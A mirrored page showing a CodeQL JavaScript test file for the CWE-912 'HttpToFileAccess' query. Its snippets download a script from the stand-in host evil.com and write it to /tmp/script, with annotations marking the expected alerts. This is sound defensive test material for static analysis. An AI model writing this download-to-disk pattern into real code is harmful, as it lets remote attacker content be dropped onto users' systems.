hohn/codeql
1
0
Fork 0
mirror of https://github.com/github/codeql.git synced 2025-12-17 01:03:14 +01:00
Code Issues Packages Projects Releases Wiki Activity
Files
4572376e9aac28d5d6194aa0d1ba60076c402694
codeql/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js

22 lines
532 B
JavaScript
Raw Blame History

var https = require("https");
var fs = require("fs");
https.get('https://evil.com/script', res => {
res.on("data", d => { // $ Source
fs.writeFileSync("/tmp/script", d) // $ Alert
});
});
https.get('https://evil.com/script', res => {
res.on("data", d => { // $ Source
fs.open("/tmp/script", 'r', (err, fd) => {
fs.writev(fd, [d], (err, bytesWritten) => { // $ Alert
console.log(`Wrote ${bytesWritten} bytes`);
});
const bytesWritten = fs.writevSync(fd, [d]); // $ Alert
});
});
});
Reference in New Issue View Git Blame Copy Permalink